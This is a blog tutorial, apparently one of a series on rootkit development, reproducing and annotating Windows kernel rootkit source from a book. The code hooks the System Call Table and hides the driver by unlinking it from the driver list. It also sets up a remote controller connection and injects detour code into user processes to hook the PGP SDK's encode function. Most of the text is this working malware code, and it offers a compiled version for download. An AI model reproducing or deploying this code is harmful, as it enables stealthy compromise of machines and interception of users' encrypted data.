extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection; //This variable keep the Address of old ZwMapViewOfSection function, we need it to call it in the function replacing the function to be hooked

 

NTSTATUS NewZwMapViewOfSection(

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

  IN ULONG Protect );

 

NTSTATUS Hook();

 

#endif

 

The above file was the header for the below file which both are the definition of functions to hook the kernel. The Hook macro is called by the the driver code afterwards

//hookManager.c

#include "ntddk.h"

#include "hookManager.h"

#include "Ghost.h"

 

NTSTATUS NewZwMapViewOfSection( // definition of function to replace the hooked function

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

 IN ULONG Protect )

{

 NTSTATUS status;

 

 DbgPrint("comint32: NewZwMapViewOfSection called.");

 // we can do whatever we want with the input here

 // and return or continue to the original function

 

 status = OldZwMapViewOfSection(       SectionHandle, //the original function which we get its address from hook macro, we can't use the original name because it is now replaced with above fucntion

  ProcessHandle,

  BaseAddress,

  ZeroBits,

  CommitSize,

  SectionOffset OPTIONAL,

  ViewSize,

  InheritDisposition,

  AllocationType,

  Protect );

 

 // we can do whatever we want with the output here

 // and return any value including the actual one

 

 return status;

}

 

NTSTATUS Hook( )

{

 // Needed for HOOK_INDEX

 //RtlInitUnicodeString(&dllName, L"\\SystemRoot\\system32\\ntdll.dll");

 

 pMyMDL = MmCreateMdl(NULL, //this function exists so a driver developer can allocate a specific physical location and map it to a page, here we use it to make an UNPROTECTED page to hook a function (because our fucntion is a kernel function and is in a protected place)

  KeServiceDescriptorTable.ServiceTableBase, //KeServiceDescriptorTable is where os keeps mapping of its ntdll.dll's function pointers, we can use it because in hookManager.h we will import it from ntdll

  KeServiceDescriptorTable.NumberOfServices * 4 );

 

 if( !pMyMDL )

  return( STATUS_UNSUCCESSFUL );

 

 MmBuildMdlForNonPagedPool( pMyMDL ); // get a page for the address our Memory Descripto Table (pMyMDL)points to (from nonpaged resources because paged resource for this resource is protected)

 pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; // SO IMP! We can change flags because we ourself have created the MDL and it is not write-protected. By setting the MDL_MAPPED_TO_SYSTEM_VA flag we can lock the page and write to a Kernel memory

 NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode ); // this function give us the base address of KeServiceDescriptorTable which now can be modified and is not PROTECTED, also locking this page means which it does not leave the memory

 

 if( !NewSystemCallTable )

  return( STATUS_UNSUCCESSFUL );

 

 // Add hooks here (remember to unhook if using DriverUnload)

 

 HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection ); //comments in hookManager.h. Pay attention to the first letters of function. The lowered case one is to be hooked and the upper cased is the pointer we defined

 

 return( STATUS_SUCCESS );

}

 

Here the driver code to hook the kernel API:

//Rootkit.c

#include "ntddk.h"

#include "Ghost.h"

#include "fileManager.h"

#include "configManager.h"

#include "hookManager.h"

 

// Used to circumvent memory protected System Call Table

PVOID* NewSystemCallTable = NULL;

PMDL pMyMDL = NULL;

// Pointer(s) to original function(s)

ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

 

// Global version data

ULONG majorVersion;

ULONG minorVersion;

 

 // Comment out in free build to avoid detection

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )

{

 DbgPrint("comint32: OnUnload called.");

 

 // Unhook any hooked functions and return the Memory Descriptor List

 if( NewSystemCallTable ) //if this var is defined, it means the kernel hooking has been called

 {

  UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection ); // the hooked function will disable, in fact the old function to be hooked goes back to its place

  MmUnmapLockedPages( NewSystemCallTable, pMyMDL ); // the page created to write in protected area will unmap

  IoFreeMdl( pMyMDL );// the page is free now and we tell this to os so it can use that

 }

 

}

 

 

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING

theRegistryPath )

{

DRIVER_DATA* driverData;

 

 // Get the operating system version

 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

 

 // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95

 // Major = 5: Windows Server 2003, Windows XP or Windows 2000

 // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95

 // Minor = 1: Windows XP

 // Minor = 2: Windows Server 2003

 

 if ( majorVersion == 5 && minorVersion == 2 )

 {

 

  DbgPrint("comint32: Running on Windows 2003");

 }

 else if ( majorVersion == 5 && minorVersion == 1 )

 {

 

  DbgPrint("comint32: Running on Windows XP");

 }

 else if ( majorVersion == 5 && minorVersion == 0 )

 {

 

  DbgPrint("comint32: Running on Windows 2000");

 }

 else if ( majorVersion == 4 && minorVersion == 0 )

 {

 

  DbgPrint("comint32: Running on Windows NT 4.0");

 }

 else

 {

 

  DbgPrint("comint32: Running on unknown system");

 }

 

 // Hide this driver

 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));

 if( driverData != NULL )

 {

  // unlink this driver entry from the driver list

  *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;

  driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;

 }

 

// Comment out in free build to avoid detection

 pDriverObject->DriverUnload = OnUnload;

 

 // Configure the controller connection

 if( !NT_SUCCESS( Configure() ) )

 {

  DbgPrint("comint32: Could not configure remote connection.\n");

  return STATUS_UNSUCCESSFUL;

 }

 

 // Hook the System Call Table

 if( !NT_SUCCESS( Hook() ) ) //In hookManage.c

 {

  DbgPrint("comint32: Could not hook the System Call Table.\n");

  return STATUS_UNSUCCESSFUL;

 }

 

 return STATUS_SUCCESS;

}

 

All of the rootkit source code above were from "Professional Rootkits by Vieler" but they are well commented and there were minor changes to compile it with the DDK and VS (on windows XP) I had. You can download the full rootkit source code and a compiled version from here.

 

Published in Rootkit development

Usage of API hooking for code injection 

One method of code injection is using API hooking! In this approach a kernel api like ZwMapViewOfSection (which is responsible of loading dlls) is first hooked and then in the hooking version we can easily hook Dynamic Link Library functions. By hooking ZwMapViewOfSection we can detect when a function in a dll is needed by a process and then initiate the code injection process i.e. we overwrite the original function so that our codes are run before or after the hooked function.

Code injection algorithm

Our methodology is simple even though it is full of details. The algorithm is:

  • Copy the dynamic link library in user memory process
  • Find address of desired function to hook in user process memory
  • Allocate space in user memory process
  • Write our functions – which is going to replace the hooked function- and other needed data to this space
  • Find the first instruction of hooked function
  • Replace it with a jump to our function
  • Copy the first instruction and a return Jump (back to the hooked function) in our hooking function

The picture below shows the concept:

User Mode hooks | before and after code injection

                       Figure 4-2(from Professional rootkits book)

You should have a solid background in OS and x86 platform to understand some of the logics behind the api hooking. For example we need to allocate some space in the process asking for the hooked function (to be mapped by its dll) because pointing to a code in other locations than the process’s memory is not allowed and the process itself already uses all of its memory. Thus we need to allocate memory there so we will be able to copy our own code replacing hooked function.

The trampoline is actually the beginning of our hook. And the first instruction of the hooked function is the entry to it which we should overwrite it! But what happens to this instruction? Well we copy this instruction to the allocated memory and then when we want to pass the control flow to the hooked function we execute this instruction.

Design concerns for api hooking and Code injection

Before jumping to the code you should ask these questions from yourself and look for answers in the c++ source codes below.

How we locate a dynamic library function?

Name of a function is supposed to become an address in opcodes so how can we search for a name in a bunch of opcodes in memory?

The hooked function has some parameters and to run our custom code we may need the parameters, how can we access them?

What do we need to inject to change the execution control to our injected code or trampoline function?

How can we find the address of our injected code or trampoline function so we put that address for the jump?

Carefully pay attention to the difference between the address of codes in our example of rootkits and their addresses in the caller process. For example we write the new hooking function in our rootkit example so then we put a copy of that in the running process. Therefore the written code in the rootkit is not supposed to be run explicitly.

How do we know what’s the first instruction of the hooked function?

How can we handle changing execution control flow to the POST-Hook (after running the original hooked function)?

What should the POST-HOOK do so the calling process of the hooked function does not detect any issues?

What we can we do in our custom hook injected code?

 

Api hooking

Ok we start from the ZwMapViewOfSection hooked kernel function (refer to the kernel hooks to see how it is done). All the codes are from “Professional rootkits by Ric Vieler”  book but they are heavily commented and I try to explain vague lines.

// Process Inject Dynamic Link Libraries

NTSTATUS NewZwMapViewOfSection(

    IN HANDLE SectionHandle,

    IN HANDLE ProcessHandle,

    IN OUT PVOID *BaseAddress,

    IN ULONG ZeroBits,

    IN ULONG CommitSize,

    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

    IN OUT PSIZE_T ViewSize,

    IN SECTION_INHERIT InheritDisposition,

    IN ULONG AllocationType,

    IN ULONG Protect )

{

            NTSTATUS status;

 

            // First complete the standard mapping process

            status = OldZwMapViewOfSection(    SectionHandle, //To see what a section is refer to https://msdn.microsoft.com/en-us/library/windows/hardware/ff563684(v=vs.85).aspx . Briefly Section Object is a memory section that can be shared(drivers want to make a shared memory for calling process)

                                                            ProcessHandle,

                                                            BaseAddress,

                                                            ZeroBits,

                                                            CommitSize,

                                                            SectionOffset OPTIONAL,

                                                            ViewSize,

                                                            InheritDisposition,

                                                            AllocationType,

                                                            Protect );

 

            // Now remap as required ( imageOffset only known for versions 4 & 5 )

            if( NT_SUCCESS( status ) && ( majorVersion == 4 || majorVersion == 5 ) )

            {

                        unsigned int     imageOffset = 0;

                        VOID*                         pSection = NULL;

                        unsigned int     imageSection = FALSE;

                        HANDLE                                 hRoot = NULL;

                        PUNICODE_STRING objectName = NULL;

                        PVOID                         pImageBase = NULL;

                        UNICODE_STRING    library1 = { 0 };

                        UNICODE_STRING    library2 = { 0 };

                        CALL_DATA_STRUCT          callData[TOTAL_HOOKS] = { 0 };

                        int                                                        hooks2inject = 0;

                       

                        // Image location higher in version 4

                        if( majorVersion == 4 )

                                    imageOffset = 24;

 

                        if( ObReferenceObjectByHandle(       SectionHandle, //this function assures that you can access this object in the calling process but here it ensures that the handle will not be closed and give us a pointer to the section. Here is a list of Object Hnadles: https://msdn.microsoft.com/en-us/library/windows/hardware/ff557758(v=vs.85).aspx

                                                                                                                        SECTION_MAP_EXECUTE,

                                                                                                                        *MmSectionObjectType,// i killed myself but i couldn't find structure of MmSectionObjectType

                                                                                                                        KernelMode,

                                                                                                                        &pSection,

                                                                                                                        NULL ) == STATUS_SUCCESS )

                        {

                                    // Check to see if this is an image section

                                    // If it is, get the root handle and the object name

                                    _asm

                                    {

                                                mov     edx, pSection

                                                mov     eax, [edx+14h] // this line fetches the psection + 20 bytes

                                                add     eax, imageOffset //apprantly it is also an address ( image_base=[psection + 20] ) . so now it calculates images_base + 24

                                                mov     edx, [eax] // now it fetches image=[images_base + 24]

                                                test    byte ptr [edx+20h], 20h // now it fetches first byte of [image +32] and and it by 00100000

                                                jz      not_image_section //if 6 bit of [image +32] byte is not 1 then it is not an image section

                                                mov     imageSection, TRUE

                                                mov     eax, [edx+24h] //it fetchesh [image+36] -- could be 9 field--

                                                mov     edx, [eax+4] //module Handle

                                                mov     hRoot, edx

                                                add     eax, 30h // "the 9th field"->"48 byte"

                                                mov     objectName, eax

                                                not_image_section:

 

                                    }

                                    if( BaseAddress )

                                                pImageBase = *BaseAddress;

 

                                    // Mapping a DLL

                                    if( imageSection && pImageBase && objectName && objectName->Length > 0 )

                                    {

                                                // define libraries of interest

                                                RtlInitUnicodeString( &library1, L"kernel32.dll" ); //just copy the string as unicode

                                                RtlInitUnicodeString( &library2, L"PGPsdk.dll" );

 

                                                if ( IsSameFile( &library1, objectName ) ) // kernel32 note: boject name contains the full path

                                                {

                                                            kernel32Base = pImageBase;

                                                }

                                                else if ( IsSameFile( &library2, objectName ) ) // PGPsdk

                                                {

                                                            // Pattern for PGP 9.0 Encode

                                                            BYTE pattern1[] = {    0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8, 0x81, 0xEC, \

                                                                                                                        0xFC, 0x00, 0x00, 0x00, 0x53, 0x33, 0xC0, 0x56, \

                                                                                                                        0x57, 0xB9, 0x26, 0x00, 0x00, 0x00, 0x8D, 0x7C, \

                                                                                                                        0x24, 0x18, 0xF3, 0xAB };

 

                                                            PVOID pfEncode = GetFunctionAddress( pImageBase, NULL, pattern1, sizeof(pattern1) ); // checks the whole segment starting at pImageBase to see the  opcodes of pattern[]

 

                                                            if( !pfEncode )

                                                            {

                                                            // Pattern for PGP 9.5 Encode

                                                                        BYTE pattern2[] = {    0x81, 0xEC, 0xFC, 0x00, 0x00, 0x00, 0x53, 0x55, \

                                                                                                                                    0x33, 0xDB, 0x68, 0x98, 0x00, 0x00, 0x00, 0x8D, \

                                                                                                                                    0x44, 0x24, 0x14, 0x53, 0x50, 0x89, 0x9C, 0x24, \

                                                                                                                                    0xB4, 0x00, 0x00, 0x00 };

 

                                                                        pfEncode = GetFunctionAddress( pImageBase, NULL, pattern2, sizeof(pattern2) );

                                                            }

 

                                                            if( pfEncode )

                                                            {

                                                                        hooks2inject = 1; // no just one hook but we can make as many hooks as we want by setting the callData array elements

                                                                        callData[0].index = USERHOOK_beforeEncode;

                                                                        callData[0].hookFunction = pfEncode;

                                                                        callData[0].parameters = 2;

                                                                        callData[0].callType = CDECL_TYPE;

                                                                        callData[0].stackOffset = 0;

                                                                        DbgPrint("comint32: NewZwMapViewOfSection pfEncode = %x",pfEncode);

                                                            }

                                                            else

                                                            {

                                                                        DbgPrint("comint32:  PGP Encode not found.");

                                                            }

                                                }

                                                if( hooks2inject > 0 ) //only if we found one function to hook and by now just Encode function

                                                {

                                                            PCHAR injectedMemory;

 

                                                            // prepare memory

                                                            injectedMemory = allocateUserMemory(); // allocate memory in process area

                                                            // inject

                                                            if( !processInject( (CALL_DATA_STRUCT*)&callData, hooks2inject, injectedMemory ) ) // copy code and data to injectedMemory and place hooks in function

                                                            {

                                                                        DbgPrint("comint32: processInject failed!\n" );

                                                            }

                                                }

                                    }

                                    ObDereferenceObject( pSection );

                        }

            }

            return status;

}

 

First in line 33 we run the original ZwMapViewOfSection to map the requested library. Then in line 91 we map the returned view (dll, file, shared buffer or etc.). As you might have expected it is not easy to find a function to be hooked in memory. The first step is to know when the desired library (containing the function to be hooked) is called by a process. Unfortunately structures that help us to do that are undocumented and we must dig memory to find some useful data. All we know is that the first “out parameter of ZwMapViewOfSection” (psection) sometimes refers to a dll and if 6th bit of (DLL=[[[psection + 20]+24]+32]), [] means dereferencing a pointer, is 1 then it is a dll and [[DLL+36]+4] is the module handle and [[DLL+36]+48] is dll name. These were the logic for assembly codes from line 109 to 141. After that in line 171 if the dll name is what we expect we can start looking for the hooked function from the start of the dll (either by its opcodes or the function’s name in GetFunctionAddress). For code injection we need to copy our code in the caller process's memory of the dll. We need to allocate some memory in the caller process so we can inject our code. Line 253 does that allocation and returns the base address of the allocated memory. After finding the function’s address we inject our custom codes using processInject in line 257.

In the preceding codes you saw a lot of codes to handle things that in user land you take them as granted but here in kernel programming you should write a function to compare two strings or manage every move in memory. IsSameFile, IsSameString and checkPattern are just helper functions to compare strings or bytes:

// This should be fast!

int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size )

{

            register unsigned char* p1 = pattern1;

            register unsigned char* p2 = pattern2;

            while( size-- > 0 )

    {

                        if( *p1++ != *p2++ )

                                    return 1;

            }

            return 0;

}

 

// Used to compare a full path to a file name(after the last \)

BOOL IsSameFile(PUNICODE_STRING shortString, PUNICODE_STRING longString)

{

            USHORT index;

            USHORT longLen;

            USHORT shortLen;

            USHORT count;

 

            index = longString->Length / 2; // wchar_t len is length / 2

 

            // search backwards for backslash

            while( --index )

                        if ( longString->Buffer[index] == L'\\' )

                                    break;

 

            // check for same length first

            longLen = (longString->Length / 2) - index - 1; //size just after the last \

            shortLen = shortString->Length / 2;

            if( shortLen != longLen )

                        return FALSE;

 

            // Compare

            count = 0;

            while ( count < longLen )

                        if ( longString->Buffer[++index] != shortString->Buffer[count++] )

                                    return FALSE;

 

            // Match!

            return TRUE;

}

 

// Compare to char strings

BOOL IsSameString( char* first, char* second )

{

            while( *first && *second )

            {

                        if( tolower( *first ) != tolower( *second ) )

                                    return FALSE;

                        first++;

                        second++;

            }

            if( *first || *second ) // if both string does not end

                        return FALSE;

 

            // strings match!

            return TRUE;

}

 

In kernel programming to avoid a page fault you should be sure that the referenced memory is mapped. That’s the reason you first map the returned reference of ZwMapViewOfSection and make sure that it is not being thrown out of memory. We have a couple of other functions to map memory, you can see the source code of FreeKernelAddress and MapKernelAddress here:

// Map user address space into the kernel

PVOID MapKernelAddress( PVOID pAddress, PMDL* ppMDL, ULONG size ) //in fact returns the base address at system which pAddress is part of it

{

            PVOID pMappedAddr = NULL;

           

            *ppMDL = IoAllocateMdl( pAddress, size, FALSE, FALSE, NULL ); //return a Memory Descriptor List to the pAddress of size length

            if( *ppMDL == NULL )

                        return NULL;

 

            __try

            {

                        MmProbeAndLockPages( *ppMDL, KernelMode ,IoReadAccess );

            }

            __except( EXCEPTION_EXECUTE_HANDLER )

            {

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            pMappedAddr = MmGetSystemAddressForMdlSafe( *ppMDL, HighPagePriority ); //MmGetSystemAddressForMdlSafe returns the base system-space virtual address that maps the physical pages that the specified MDL describes. If the pages are not already mapped to system address space and the attempt to map them fails, NULL is returned.

            if( !pMappedAddr )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            return pMappedAddr;

}

 

// Free kernel space after mapping in user memory

VOID FreeKernelAddress( PVOID* ppMappedAddr, PMDL* ppMDL )

{

            if( *ppMappedAddr && *ppMDL )

                        MmUnmapLockedPages( *ppMappedAddr, *ppMDL );

 

            *ppMappedAddr = NULL;

            if( *ppMDL )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

            }

            *ppMDL = NULL;

}

 

In addition to these useful helpers, GetFunctionAddress is an important function which finds the address of function to be hooked. It does that by digging into a dll. A dll has a header which it is PIMAGE_DOS_HEADER struct. You can see its structure in Figure 1. PIMAGE_DOS_HEADER has the e_lfanew field which it points to a PIMAGE_NT_HEADER (Figure 2) and PIMAGE_NT_HEADER has a virtual address field which points to a PIMAGE_EXPORT_DIRECTORY structure (Figure 3). PIMAGE_EXPORT_DIRECTORY has several arrays that the names of functions and their addresses are in there. Locating a function by its name is done using this structure in a dll header.

Pimage_Dos_Header structure for code injection

Figure 1 (PIMAGE_DOS_HEADER)

PIMAGE_NT_HEADER for code injection

Figure 2 (PIMAGE_NT_HEADER)

PIMAGE_EXPORT_DIRECTORY structure for code injection

Figure 3 (PIMAGE_EXPORT_DIRECTORY)

Below is the code of GetFunctionAddress:

// Get the address of a function from a DLL

// Pass in the base address of the DLL

// Pass function name OR pattern and pettern length

PVOID GetFunctionAddress(  PVOID BaseAddress,

                                                                                    char* functionName,

                                                                                    PBYTE pattern,

                                                                                    size_t patternLength  )

{

    ULONG imageSize;

    ULONG virtualAddress;

    PVOID returnAddress;

    PULONG functionAddressArray;

    PWORD ordinalArray;

    PULONG functionNameArray;

    ULONG loop;

    ULONG ordinal;

            PVOID mappedBase;

            PMDL pMDL;

            BYTE* bytePtr;

            BYTE* maxBytePtr;

    PIMAGE_DOS_HEADER pDOSHeader;

    PIMAGE_NT_HEADER pNTHeader;

    PIMAGE_EXPORT_DIRECTORY exportDirectory;

 

            imageSize = GetImageSize( BaseAddress ); //to get the size of dll

            mappedBase = MapKernelAddress( BaseAddress, &pMDL, imageSize ); // mapping baseAddress with imageSize, the reason of mapping is explained in GetImageSize

 

            if ( functionName == NULL )

            {

                        // Search for function pattern

                        returnAddress = 0;

                        maxBytePtr = (PBYTE)((DWORD)mappedBase + (DWORD)imageSize - (DWORD)patternLength);

                        for( bytePtr = (PBYTE)mappedBase; bytePtr < maxBytePtr; bytePtr++ )

                        {         

                                    if( checkPattern( bytePtr, pattern, patternLength ) == 0 )

                                    {

                                                returnAddress = (PVOID)((DWORD)BaseAddress + (DWORD)bytePtr - (DWORD)mappedBase); // it actually finds the bytePtr that is address of function in the kernel so to find it in user process space we must subtract it from mappedBase and add it to user address space

                                                break;

                                    }

                        }

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return returnAddress;

            }

           

            // Search for function name

    pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;

    pNTHeader = (PIMAGE_NT_HEADER)((PCHAR)mappedBase + pDOSHeader->e_lfanew);

    imageSize = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; //IMAGE_DIRECTORY_ENTRY_EXPORT is an index which is defined by kernel and is equal to 0. this line in fact gets the number of functions exported

    virtualAddress = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; //this line gets the address of PIMAGE_EXPORT_DIRECTORY

    exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)mappedBase + virtualAddress); // to see the structure refer to image file(the gif one)

    functionAddressArray = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfFunctions); // an array containing address of exported functions

    ordinalArray  = (PWORD)((PCHAR)mappedBase + exportDirectory->AddressOfNameOrdinals); // and array which its element contain index to AddressOfFunctions. suppose you have the name X. you should first find the X name in AddressOfNames and then use index of that name in array to find its currosponding value in the ordinal. the value is index of function in AddressOfFunctions

    functionNameArray     = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfNames);

 

            ordinal = (ULONG)functionName;

    if (!ordinal)

            {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return 0;

            }

    if( ordinal <= exportDirectory->NumberOfFunctions ) // this is just the function capability to also resolve based on ordinal value

    {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

        return (PVOID)((PCHAR)BaseAddress + functionAddressArray[ordinal - 1]);

    }

 

    for( loop = 0; loop < exportDirectory->NumberOfNames; loop++ )

    {

                        ordinal = ordinalArray[loop];

                        if( functionAddressArray[ordinal] < virtualAddress || functionAddressArray[ordinal] >= virtualAddress + imageSize ) // check to control that function address is not in PIMAGE_EXPORT_DIRECTORY teritory

        {

            if( IsSameString( (PSTR)((PCHAR)mappedBase + functionNameArray[loop]), functionName ) ) //((PCHAR)mappedBase + functionNameArray[loop]) makes the pointer to the name of function ### Probably in Exe itself there is not need to make this addition because it is relative address but since we mirizim kerm it's needed ###

            {

                                                returnAddress = (PVOID)functionAddressArray[ordinal];

                                                if( mappedBase )

                                                            FreeKernelAddress( &mappedBase, &pMDL );

                return (PVOID)((DWORD)BaseAddress + (DWORD)returnAddress); //functionAddressArray[ordinal] is added to BaseAddress since we want the function location in process

            }

        }

    }

 

            DbgPrint("comint32: EXPORT NOT FOUND, function = %s", functionName);

           

            if( mappedBase )

                        FreeKernelAddress( &mappedBase, &pMDL );

            return 0;

}

 

To allocate memory for our injected code we used AllocateUserMemory, here is the source code:

 

PCHAR allocateUserMemory()
{
LONG memorySize;
LONG tableSize;
LONG codeSize;
LONG dataSize;
ULONG buffer[2];
NTSTATUS status;
PCHAR pMemory;
IN_PROCESS_DATA* pData;

 

// Calculate sizes
// tableSize = (DetourFunction - HookTable) * TOTAL_HOOKS
// codeSize = EndOfInjectedCode - DetourFunction
// dataSize = sizof( IN_PROCESS_DATA )
__asm
{
lea eax, HookTable
lea ebx, DetourFunction
lea ecx, EndOfInjectedCode
mov edx, ebx
sub edx, eax
mov tableSize, edx
mov edx, ecx
sub edx, ebx
mov codeSize, edx
}
tableSize = tableSize * TOTAL_HOOKS;
dataSize = sizeof( IN_PROCESS_DATA );
memorySize = tableSize + codeSize + dataSize; //whole size to be allocated in process area

 

// Allocate memory
buffer[0] = 0;
buffer[1] = memorySize;
//Remember that the process called ZwMapViewOfSection and we hooked that function, and the code here is called from the process calling that function. This means by passing current process we allocate memory in process's area
status = ZwAllocateVirtualMemory( (HANDLE)-1, (PVOID*)buffer, 0, &buffer[1], MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // (HANDLE) -1 : means casting -1 to HANDLE and -1 means current process, buffer : is base address of allocated memory, &buffer[1]: the size of page to be allocated, and in return the actual size allocated
pMemory = (PCHAR)(buffer[0]); // the base address of allocated page

 

if( !NT_SUCCESS( status ) || !pMemory )
return NULL;

 

// initialize memory
memset( pMemory, 0x90, tableSize + codeSize ); // set no-op at start to end of code
pData = (IN_PROCESS_DATA*)(pMemory + tableSize + codeSize );
memset( (PVOID)pData, 0, dataSize ); // set just zero in data section

return pMemory;
}

 

 

HookTable, DetourFunction and In_Process_Data are codes and data to be injected in the caller process. Don't worry you see their source codes in a minute but for now just be aware of the orders of these functions exactly as mentioned. All of the injected codes are between HookTable and DetourFunction. In_Process_Data is just an struct keeping the pointers to the kernel library functions.

Code injection

By code injection we change the first instruction of hooked function, to transfer control to our custom code, and copy our required codes.

In order to inject our codes we should know their destination addresses. When we allocate address we know the beginning address of allocated memory. That address is where we start to copy our codes. All of the codes to be copied are not for execution; we need to reserve some spaces so we can pass data from the execution of hooked kernel function to the userland hooked function (These data help the hooking function to know how to set the stack so no fault or exception arises). Moreover we need to save the original first instruction of hooked function. We also need to reserve some spaces for references to the library functions in OS. getHookPointers function help us to find the offset to mentioned places by adding the size of each section to the start of allocated memory and keeping track of the end of each section.

BOOL getHookPointers( PCHAR pMemory, PCHAR* pTable, PCHAR* pCode, PCHAR* pData ) //this function sets address of HookTable function in pTable and Detour function in pCode and IN_PROCESS_DATA in pData

{

            LONG  tableSize = 0;

            LONG  codeSize = 0;

            LONG  dataSize = 0;

 

            __asm

            {

                        lea eax, HookTable

                        lea ebx, DetourFunction

                        lea ecx, EndOfInjectedCode

                        mov edx, ebx

                        sub edx, eax

                        mov tableSize, edx

                        mov edx, ecx

                        sub edx, ebx

                        mov codeSize, edx

            }

           

            tableSize = tableSize * TOTAL_HOOKS;

            dataSize = sizeof(IN_PROCESS_DATA);

            *pTable = pMemory;

            *pCode = *pTable + tableSize;

            *pData = *pCode + codeSize;

            return TRUE;

}

 

pTable is where the first modified instruction of function to be hooked is going to point. Also we keep the parameters from kernel and the original first instruction of hooked function there. After transferring the execution to the pTable, some initializations happen and then the execution goes to pCode. pData is where we save pointers to kernel library functions.

Here are the codes to be copied in pTable:

#define EMIT_FOUR( x ) __asm{ __asm _emit x __asm _emit x __asm _emit x __asm _emit x } // __asm _emit shows the x (like an opcode) directly

void __declspec(naked) HookTable( void )

{

            __asm //Pay attention to the usage of edx, it is never saved so it's initial value overwritten but no problem since nothing still have  been run!

            {

                        push eax //save ax value -- other registers are not saved since the only register will be using are ax and dx and dx is gonna be the parameter for the detour function

                        xor eax, eax

                        call phoney_call // calls next line because it wants to save the next line address (not effective address which can be get by lea instruction) on top of the stack (since call instruction saves the return address which is phoney call address)

phoney_call:

                        lea eax, phoney_call

                        lea edx, phoney_jump

                        sub edx, eax // it needs the (phoney_call - phoney_jump) value because then it will be added to the real address of phoney_call

                        pop eax // here the address of phoney_call is poped from the top of stack

                        add eax, edx //the REAL address of phoeny_jump is calculated

                        mov edx, eax //dx will be used by detuor function and it will not be modified till then since it will be called by a jump at next instruction

                        pop eax // the eax value which was saved is now restored

                        jmp DetourFunction //This instruction should be modified because so far it points to the complied code's detour function but what we need is the address of detour's function in the caller process

phoney_jump:

                        EMIT_FOUR( 0xff ) // this instruction makes a 32 bit (since memory access is based on 4 bytes) value of -1 -- this value then will be examind by process inject to find the parameter data place--

                        EMIT_FOUR( 0x0 ) //the previous 4 bytes, this and following 2 bytes will be used to store the call-data structure that was passed to process-inject(they are needed to adjust the stack)

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x90 ) // this no-op 4 bytes plus 8 next 4-bytes will be used to store first instruction and jmp to original function(no-op+jmp or normal-instruction +jmp to original function)

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        jmp EndOfInjectedCode // it then will be replaced by a no-op

            }

}

 

__declspec(naked) means neither callee nor the caller are supposed to clean the stack. As I mentioned HookTable is where the initialization for the real code takes place. This function just calculates the real address that points to the parameters from kernel (our kernel hooked function) and then transfers control to the DetourFunction (where also pCode points to) where the real magic happens:

#define PUSH_STACKFRAME( ) __asm{ __asm push ebp __asm mov ebp, esp __asm sub esp, __LOCAL_SIZE __asm push edi __asm push esi __asm push ebx __asm pushfd } //we need it because some of our functions are naked so it's our duty to write prolouge

#define POP_STACKFRAME( ) __asm{ __asm popfd __asm pop ebx __asm pop esi __asm pop edi __asm mov esp, ebp __asm pop ebp } //because the end pop ebp the stack points to its value before the function

void __declspec(naked) DetourFunction( void ) // the __declspec(naked) means the prolouge size is fixed (in fact there is no prolouge and the prolouge will be manualy written)

{

            PUSH_STACKFRAME(); // save the ebp and then store the esp in ebp .... and save edi,esi,ebx and flags -- this is in fact the prolouge--

            {

                        DWORD                      hookIndex;

                        DWORD                      parameters;

                        DWORD                      callType;

                        DWORD                      stackOffset;

                        PCHAR                        trampolineFunction;

                        IN_PROCESS_DATA*            callData;

                        PCHAR                        codeStart;

                        PDWORD                    originalStack;

                        DWORD                      tempStack;

                        int                                loop;

                        int                                parameters4return;

                        DWORD                      parameter2return = 0;

                        DWORD                      continueFlag;

